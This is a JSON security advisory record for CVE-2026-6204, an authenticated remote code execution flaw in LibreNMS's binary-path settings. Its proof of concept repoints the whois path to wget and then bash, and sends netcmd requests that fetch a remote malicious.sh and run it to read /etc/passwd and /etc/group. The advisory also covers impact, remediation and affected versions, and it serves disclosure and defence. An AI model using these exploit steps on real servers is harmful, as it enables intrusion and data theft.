{"id":"GHSA-pr3g-phhr-h8fh","summary":"LibreNMS is Vulnerable to Remote Code Execution by Arbitrary File Write","details":"### Summary\nA vulnerability has been identified that allows an authenticated administrator to execute arbitrary code on the host server. By modifying the binary path settings for built-in network tools and bypassing an input filter, an attacker with administrative privileges can download and execute malicious payloads.\n\n### Details\nThe application allows administrative users to configure the absolute binary paths for network diagnostic tools at `/settings/external/binaries`. This setting does not sufficiently validate ensuring the paths remain restricted to safe, intended executables. These tools are invoked by sending a request to the `GET /ajax/netcmd` endpoint. While there is an existing input filter designed to restrict arguments to valid IP addresses or hostnames, this filter can be bypassed.\n\n### PoC\nTo reproduce this vulnerability, a remote HTTP server should be hosted with a malicious script/executable, ensure the remote server is reachable by the server running LibreNMS. The PoC will use the file `malicious.sh` containing the following content. It will return the content of /etc/passwd and /etc/group, current working directory, username that is running the script, and it will list files of the current directory.\n\n```bash\n#!/usr/bin/env bash\n\ncat /etc/passwd\ncat /etc/group\nwhoami\npwd\nls\n```\n\n1. Host a remote HTTP server that the server can reach and place the malicious script on the remote server. For demonstration, I will start it on localhost.\n\u003cimg width=\"593\" height=\"481\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ef235f8e-089b-462c-b12c-7b5ae2037fc5\" /\u003e\n\n2. Make sure the malicious script `malicious.sh` can be downloaded. \n\u003cimg width=\"516\" height=\"100\" alt=\"image\" src=\"https://github.com/user-attachments/assets/60b04755-e824-4384-81f2-2feacdc8e273\" /\u003e\n\n3. Login with an admin account and navigate to Global Settings -\u003e External -\u003e Binary Locations\n\u003cimg width=\"797\" height=\"201\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f914cc9e-f45b-444f-8f16-058101d84576\" /\u003e\n\n4. Change the whois binary path to the path of wget (e.g. /usr/bin/wget).\n\u003cimg width=\"478\" height=\"58\" alt=\"image\" src=\"https://github.com/user-attachments/assets/57fbf033-ff07-41dc-9bac-2f3b3e897ea6\" /\u003e\n\n5. Send the request `GET /ajax/netcmd?cmd=whois&query={remote http server's ip address}/malicious.sh`. The response should contain wget's output, and malicious.sh would be downloaded by the server.\n\u003cimg width=\"900\" height=\"209\" alt=\"image\" src=\"https://github.com/user-attachments/assets/942b6082-18db-4838-b06c-b98d7fa1f8d0\" /\u003e\n\n6. After that, change the whois binary path to the path of bash (e.g. /bin/bash). \n\u003cimg width=\"751\" height=\"56\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0c11d86e-0dab-4780-bdb7-f328bbb758f8\" /\u003e\n\n7. Send the request GET /ajax/netcmd?cmd=whois&query=malicious.sh to execute the script. \n\u003cimg width=\"846\" height=\"688\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d4dcf8e9-5a75-407c-8dd4-96d11f090dbe\" /\u003e\n\n### Impact\nThis vulnerability allows a malicious actor to achieve Remote Code Execution (RCE), potentially leading to complete system compromise, data exfiltration, or lateral movement within the network.\n\n### Remediation Advice\nLoading Binary Path from a config file instead of exposing settings in WebUI can eliminate this issue. If it is not possible, enforcing more validations and fix the `ip_or_hostname` bypass in https://github.com/librenms/librenms/blob/master/app/Providers/AppServiceProvider.php#L169 to reduce the risk of RCE.\n\n### Prerequisite\nThe attacker must have a valid Administrator account to exploit this vulnerability.","aliases":["CVE-2026-6204"],"modified":"2026-04-14T23:11:25.857391Z","published":"2026-03-26T18:04:01Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-03-26T18:04:01Z","nvd_published_at":null,"cwe_ids":["CWE-78"],"severity":"HIGH"},"references":[{"type":"WEB","url":"https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-6204"},{"type":"PACKAGE","url":"https://github.com/librenms/librenms"},{"type":"WEB","url":"https://github.com/librenms/librenms/blob/master/app/Providers/AppServiceProvider.php#L169"},{"type":"WEB","url":"https://projectblack.io/blog/librenms-authenticated-rce-and-xss/#binary-path-rce-poc"}],"affected":[{"package":{"name":"librenms/librenms","ecosystem":"Packagist","purl":"pkg:composer/librenms/librenms"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"1.48"},{"fixed":"26.3.0"}]}],"versions":["1.48","1.48.1","1.49","1.50","1.50.1","1.51","1.52","1.53","1.53.1","1.54","1.55","1.56","1.57","1.58","1.58.1","1.59","1.60","1.61","1.62","1.62.1","1.62.2","1.63","1.64","1.64.1","1.65","1.65.1","1.66","1.67","1.68","1.69","1.70.0","1.70.1","21.1.0","21.10.0","21.10.1","21.10.2","21.11.0","21.12.0","21.12.1","21.2.0","21.3.0","21.4.0","21.5.0","21.5.1","21.6.0","21.7.0","21.8.0","21.9.0","21.9.1","22.1.0","22.10.0","22.11.0","22.12.0","22.2.0","22.2.1","22.2.2","22.3.0","22.4.0","22.4.1","22.5.0","22.6.0","22.7.0","22.8.0","22.9.0","23.1.0","23.1.1","23.10.0","23.11.0","23.2.0","23.4.0","23.4.1","23.5.0","23.6.0","23.7.0","23.8.0","23.8.1","23.8.2","23.9.0","23.9.1","24.1.0","24.10.0","24.10.1","24.11.0","24.12.0","24.2.0","24.3.0","24.4.0","24.4.1","24.5.0","24.6.0","24.7.0","24.8.0","24.8.1","24.9.0","24.9.1","25.1.0","25.10.0","25.11.0","25.12.0","25.2.0","25.3.0","25.4.0","25.5.0","25.6.0","25.7.0","25.8.0","25.9.0","25.9.1","26.1.0","26.1.1","26.2.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-pr3g-phhr-h8fh/GHSA-pr3g-phhr-h8fh.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"}]}